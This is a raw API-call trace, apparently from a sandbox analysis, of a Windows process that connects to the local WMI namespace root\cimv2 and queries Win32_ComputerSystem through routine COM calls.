	[0199.121] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c838280, riid=0x1c80ccd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ccb0 | out: ppvObject=0x1c80ccb0*=0x1c838280) returned 0x0
	[0199.121] WbemDefPath:IUnknown:Release (This=0x1c838280) returned 0x2
	[0199.121] WbemDefPath:IUnknown:Release (This=0x1c838280) returned 0x1
	[0199.121] CoGetContextToken (in: pToken=0x1c80cdd0 | out: pToken=0x1c80cdd0) returned 0x0
	[0199.121] CoGetContextToken (in: pToken=0x1c80cd10 | out: pToken=0x1c80cd10) returned 0x0
	[0199.121] WbemDefPath:IUnknown:AddRef (This=0x1c838280) returned 0x2
	[0199.121] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c838280, riid=0x1c80ce50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ce30 | out: ppvObject=0x1c80ce30*=0x1c838280) returned 0x0
	[0199.121] WbemDefPath:IUnknown:Release (This=0x1c838280) returned 0x2
	[0199.122] WbemDefPath:IUnknown:AddRef (This=0x1c838280) returned 0x3
	[0199.122] WbemDefPath:IWbemPath:SetText (This=0x1c838280, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.122] WbemDefPath:IUnknown:Release (This=0x1c838280) returned 0x2
	[0199.122] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c838280, puCount=0x1c80d0e0 | out: puCount=0x1c80d0e0*=0x2) returned 0x0
	[0199.122] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d0e0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d0e0*=0x17, pszText=0x0) returned 0x0
	[0199.122] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d0e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d0e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.122] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c838280, puCount=0x1c80d090 | out: puCount=0x1c80d090*=0x2) returned 0x0
	[0199.122] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d090*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d090*=0x17, pszText=0x0) returned 0x0
	[0199.122] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80d090*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d090*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.122] CoGetObjectContext (in: riid=0x1c80cfc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfc0 | out: ppv=0x1c80cfc0*=0x181868) returned 0x0
	[0199.122] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfe0 | out: pAptType=0x1c80cfe0*=1) returned 0x0
	[0199.122] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0e8 | out: ppvObject=0x1c80d0e8*=0x0) returned 0x80004002
	[0199.122] IUnknown:Release (This=0x181868) returned 0x1
	[0199.123] CoGetClassObject (in: rclsid=0x1b8026f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cc70 | out: ppv=0x1c80cc70*=0x1c831a20) returned 0x0
	[0199.123] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831a20, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c980 | out: ppvObject=0x1c80c980*=0x0) returned 0x80004002
	[0199.123] WbemLocator:IClassFactory:CreateInstance (in: This=0x1c831a20, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c968 | out: ppvObject=0x1c80c968*=0x1c831a40) returned 0x0
	[0199.123] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831a40, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c870 | out: ppvObject=0x1c80c870*=0x1c831a40) returned 0x0
	[0199.123] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831a40, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8f0 | out: ppvObject=0x1c80c8f0*=0x0) returned 0x80004002
	[0199.124] WbemLocator:IUnknown:AddRef (This=0x1c831a40) returned 0x3
	[0199.124] CoGetContextToken (in: pToken=0x1c80c540 | out: pToken=0x1c80c540) returned 0x0
	[0199.124] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831a40, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c500 | out: ppvObject=0x1c80c500*=0x0) returned 0x80004002
	[0199.124] CoGetContextToken (in: pToken=0x1c80c510 | out: pToken=0x1c80c510) returned 0x0
	[0199.124] WbemLocator:IUnknown:AddRef (This=0x1c831a40) returned 0x4
	[0199.124] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831a40, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c628 | out: ppvObject=0x1c80c628*=0x0) returned 0x80004002
	[0199.124] WbemLocator:IUnknown:Release (This=0x1c831a40) returned 0x3
	[0199.124] WbemLocator:IUnknown:Release (This=0x1c831a40) returned 0x2
	[0199.124] WbemLocator:IUnknown:Release (This=0x1c831a20) returned 0x0
	[0199.124] WbemLocator:IUnknown:Release (This=0x1c831a40) returned 0x1
	[0199.125] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0199.125] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0199.125] WbemLocator:IUnknown:AddRef (This=0x1c831a40) returned 0x2
	[0199.125] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831a40, riid=0x1c80cbb0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80cb90 | out: ppvObject=0x1c80cb90*=0x1c831a40) returned 0x0
	[0199.125] WbemLocator:IUnknown:Release (This=0x1c831a40) returned 0x2
	[0199.125] WbemLocator:IUnknown:Release (This=0x1c831a40) returned 0x1
	[0199.125] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c838280, puCount=0x1c80cf90 | out: puCount=0x1c80cf90*=0x2) returned 0x0
	[0199.125] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=8, puBuffLength=0x1c80cf90*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cf90*=0x17, pszText=0x0) returned 0x0
	[0199.125] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=8, puBuffLength=0x1c80cf90*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cf90*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.125] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c80cc80 | out: ppv=0x1c80cc80*=0x1c831a60) returned 0x0
	[0199.125] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c831a60, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c80cf10 | out: ppNamespace=0x1c80cf10*=0x1c83a6e8) returned 0x0
	[0200.186] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83a6e8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80caf8 | out: ppvObject=0x1c80caf8*=0x1b807970) returned 0x0
	[0200.186] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b807970, pProxy=0x1c83a6e8, pAuthnSvc=0x1c80caf0, pAuthzSvc=0x1c80caec, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8, pImpLevel=0x1c80cb04, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00 | out: pAuthnSvc=0x1c80caf0*=0xa, pAuthzSvc=0x1c80caec*=0x0, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8*=0x6, pImpLevel=0x1c80cb04*=0x2, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00*=0x1) returned 0x0
	[0200.186] WbemLocator:IUnknown:Release (This=0x1b807970) returned 0x1
	[0200.186] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83a6e8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca98 | out: ppvObject=0x1c80ca98*=0x1b8079b0) returned 0x0
	[0200.186] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83a6e8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca28 | out: ppvObject=0x1c80ca28*=0x1b807970) returned 0x0
	[0200.187] WbemLocator:IClientSecurity:SetBlanket (This=0x1b807970, pProxy=0x1c83a6e8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0200.187] WbemLocator:IUnknown:Release (This=0x1b807970) returned 0x2
	[0200.187] WbemLocator:IUnknown:Release (This=0x1b8079b0) returned 0x1
	[0200.187] CoTaskMemFree (pv=0x1b81e620) 
	[0200.187] WbemLocator:IUnknown:Release (This=0x1c831a60) returned 0x0
	[0200.187] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83a6e8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c710 | out: ppvObject=0x1c80c710*=0x1b8079b0) returned 0x0
	[0200.187] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8079b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c790 | out: ppvObject=0x1c80c790*=0x0) returned 0x80004002
	[0200.188] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8079b0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c528 | out: ppvObject=0x1c80c528*=0x0) returned 0x80004002
	[0200.189] WbemLocator:IUnknown:AddRef (This=0x1b8079b0) returned 0x3
	[0200.189] CoGetContextToken (in: pToken=0x1c80c3e0 | out: pToken=0x1c80c3e0) returned 0x0
	[0200.189] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8079b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c3a0 | out: ppvObject=0x1c80c3a0*=0x1b807898) returned 0x0
	[0200.189] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b807898, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c3d0 | out: pCid=0x1c80c3d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.189] WbemLocator:IUnknown:Release (This=0x1b807898) returned 0x3
	[0200.189] CoGetContextToken (in: pToken=0x1c80c3b0 | out: pToken=0x1c80c3b0) returned 0x0
	[0200.189] WbemLocator:IUnknown:AddRef (This=0x1b8079b0) returned 0x4
	[0200.190] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8079b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c8 | out: ppvObject=0x1c80c4c8*=0x1b807980) returned 0x0
	[0200.190] WbemLocator:IUnknown:Release (This=0x1b8079b0) returned 0x4
	[0200.190] WbemLocator:IRpcOptions:Query (in: This=0x1b807980, pPrx=0x1b8079b0, dwProperty=2, pdwValue=0x1c80c538 | out: pdwValue=0x1c80c538) returned 0x80004002
	[0200.190] WbemLocator:IUnknown:Release (This=0x1b807980) returned 0x3
	[0200.190] WbemLocator:IUnknown:Release (This=0x1b8079b0) returned 0x2
	[0200.190] CoGetContextToken (in: pToken=0x1c80c8b0 | out: pToken=0x1c80c8b0) returned 0x0
	[0200.190] CoGetContextToken (in: pToken=0x1c80c7f0 | out: pToken=0x1c80c7f0) returned 0x0
	[0200.190] WbemLocator:IUnknown:AddRef (This=0x1b8079b0) returned 0x3
	[0200.190] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8079b0, riid=0x1c80c930*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80c910 | out: ppvObject=0x1c80c910*=0x1c83a6e8) returned 0x0
	[0200.191] WbemLocator:IUnknown:Release (This=0x1b8079b0) returned 0x3
	[0200.191] WbemLocator:IUnknown:Release (This=0x1c83a6e8) returned 0x2
	[0200.191] WbemLocator:IUnknown:Release (This=0x1c83a6e8) returned 0x1
	[0200.191] CoGetContextToken (in: pToken=0x1c80ceb0 | out: pToken=0x1c80ceb0) returned 0x0
	[0200.191] WbemLocator:IUnknown:AddRef (This=0x1b8079b0) returned 0x2
	[0200.191] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8079b0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca80 | out: ppvObject=0x1c80ca80*=0x1b8079b0) returned 0x0
	[0200.192] WbemLocator:IUnknown:Release (This=0x1b8079b0) returned 0x2
	[0200.192] WbemLocator:IUnknown:Release (This=0x1b8079b0) returned 0x1
	[0200.192] CoGetContextToken (in: pToken=0x1c80cb50 | out: pToken=0x1c80cb50) returned 0x0
	[0200.192] CoGetContextToken (in: pToken=0x1c80ca90 | out: pToken=0x1c80ca90) returned 0x0
	[0200.192] WbemLocator:IUnknown:AddRef (This=0x1b8079b0) returned 0x2
	[0200.192] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8079b0, riid=0x1c80cbd0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80cbb0 | out: ppvObject=0x1c80cbb0*=0x1c83a6e8) returned 0x0
	[0200.192] WbemLocator:IUnknown:Release (This=0x1b8079b0) returned 0x2
	[0200.192] WbemLocator:IUnknown:AddRef (This=0x1c83a6e8) returned 0x3
	[0200.192] IWbemServices:ExecQuery (in: This=0x1c83a6e8, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x1c80d048 | out: ppEnum=0x1c80d048*=0x1c83c728) returned 0x0
	[0200.199] IUnknown:QueryInterface (in: This=0x1c83c728, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc58 | out: ppvObject=0x1c80cc58*=0x1c83c730) returned 0x0
	[0200.199] IClientSecurity:QueryBlanket (in: This=0x1c83c730, pProxy=0x1c83c728, pAuthnSvc=0x1c80cc50, pAuthzSvc=0x1c80cc4c, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48, pImpLevel=0x1c80cc64, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60 | out: pAuthnSvc=0x1c80cc50*=0xa, pAuthzSvc=0x1c80cc4c*=0x0, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48*=0x6, pImpLevel=0x1c80cc64*=0x2, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60*=0x1) returned 0x0
	[0200.199] IUnknown:Release (This=0x1c83c730) returned 0x1
	[0200.199] IUnknown:QueryInterface (in: This=0x1c83c728, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cbf8 | out: ppvObject=0x1c80cbf8*=0x1b807830) returned 0x0
	[0200.199] IUnknown:QueryInterface (in: This=0x1c83c728, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cb88 | out: ppvObject=0x1c80cb88*=0x1c83c730) returned 0x0
	[0200.199] IClientSecurity:SetBlanket (This=0x1c83c730, pProxy=0x1c83c728, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0200.201] IUnknown:Release (This=0x1c83c730) returned 0x2
	[0200.201] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x1
	[0200.201] CoTaskMemFree (pv=0x1b81e710) 
	[0200.201] IUnknown:QueryInterface (in: This=0x1c83c728, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c830 | out: ppvObject=0x1c80c830*=0x1b807830) returned 0x0
	[0200.202] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8b0 | out: ppvObject=0x1c80c8b0*=0x0) returned 0x80004002
	[0200.202] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c648 | out: ppvObject=0x1c80c648*=0x0) returned 0x80004002
	[0200.203] WbemLocator:IUnknown:AddRef (This=0x1b807830) returned 0x3
	[0200.203] CoGetContextToken (in: pToken=0x1c80c500 | out: pToken=0x1c80c500) returned 0x0
	[0200.203] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c0 | out: ppvObject=0x1c80c4c0*=0x1b807718) returned 0x0
	[0200.203] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b807718, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c4f0 | out: pCid=0x1c80c4f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.204] WbemLocator:IUnknown:Release (This=0x1b807718) returned 0x3
	[0200.204] CoGetContextToken (in: pToken=0x1c80c4d0 | out: pToken=0x1c80c4d0) returned 0x0
	[0200.204] WbemLocator:IUnknown:AddRef (This=0x1b807830) returned 0x4
	[0200.204] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c5e8 | out: ppvObject=0x1c80c5e8*=0x1b807800) returned 0x0
	[0200.204] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x4
	[0200.204] WbemLocator:IRpcOptions:Query (in: This=0x1b807800, pPrx=0x1b807830, dwProperty=2, pdwValue=0x1c80c658 | out: pdwValue=0x1c80c658) returned 0x80004002
	[0200.204] WbemLocator:IUnknown:Release (This=0x1b807800) returned 0x3
	[0200.204] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x2
	[0200.205] CoGetContextToken (in: pToken=0x1c80c9d0 | out: pToken=0x1c80c9d0) returned 0x0
	[0200.205] CoGetContextToken (in: pToken=0x1c80c910 | out: pToken=0x1c80c910) returned 0x0
	[0200.205] WbemLocator:IUnknown:AddRef (This=0x1b807830) returned 0x3
	[0200.205] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x1c80ca50*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ca30 | out: ppvObject=0x1c80ca30*=0x1c83c728) returned 0x0
	[0200.205] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x3
	[0200.205] IUnknown:Release (This=0x1c83c728) returned 0x2
	[0200.205] IUnknown:Release (This=0x1c83c728) returned 0x1
	[0200.205] WbemLocator:IUnknown:Release (This=0x1c83a6e8) returned 0x2
	[0200.206] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c838280, puCount=0x1c80cff0 | out: puCount=0x1c80cff0*=0x2) returned 0x0
	[0200.206] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80cff0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cff0*=0x17, pszText=0x0) returned 0x0
	[0200.206] WbemDefPath:IWbemPath:GetText (in: This=0x1c838280, lFlags=4, puBuffLength=0x1c80cff0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cff0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.206] CoGetContextToken (in: pToken=0x1c80cbf0 | out: pToken=0x1c80cbf0) returned 0x0
	[0200.206] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0200.206] WbemLocator:IUnknown:AddRef (This=0x1b807830) returned 0x2
	[0200.206] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807830, riid=0x1c80cc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cc50 | out: ppvObject=0x1c80cc50*=0x1c83c728) returned 0x0
	[0200.206] WbemLocator:IUnknown:Release (This=0x1b807830) returned 0x2
	[0200.206] IUnknown:AddRef (This=0x1c83c728) returned 0x3
	[0200.206] IEnumWbemClassObject:Clone (in: This=0x1c83c728, ppEnum=0x1c80d0b0 | out: ppEnum=0x1c80d0b0*=0x1c83c8b8) returned 0x0
	[0200.208] IUnknown:QueryInterface (in: This=0x1c83c8b8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cd08 | out: ppvObject=0x1c80cd08*=0x1c83c8c0) returned 0x0
	[0200.208] IClientSecurity:QueryBlanket (in: This=0x1c83c8c0, pProxy=0x1c83c8b8, pAuthnSvc=0x1c80cd00, pAuthzSvc=0x1c80ccfc, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8, pImpLevel=0x1c80cd14, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10 | out: pAuthnSvc=0x1c80cd00*=0xa, pAuthzSvc=0x1c80ccfc*=0x0, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8*=0x6, pImpLevel=0x1c80cd14*=0x2, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10*=0x1) returned 0x0
	[0200.208] IUnknown:Release (This=0x1c83c8c0) returned 0x1
	[0200.208] IUnknown:QueryInterface (in: This=0x1c83c8b8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cca8 | out: ppvObject=0x1c80cca8*=0x1b807cb0) returned 0x0
	[0200.208] IUnknown:QueryInterface (in: This=0x1c83c8b8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc38 | out: ppvObject=0x1c80cc38*=0x1c83c8c0) returned 0x0
	[0200.208] IClientSecurity:SetBlanket (This=0x1c83c8c0, pProxy=0x1c83c8b8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0200.210] IUnknown:Release (This=0x1c83c8c0) returned 0x2
	[0200.210] WbemLocator:IUnknown:Release (This=0x1b807cb0) returned 0x1
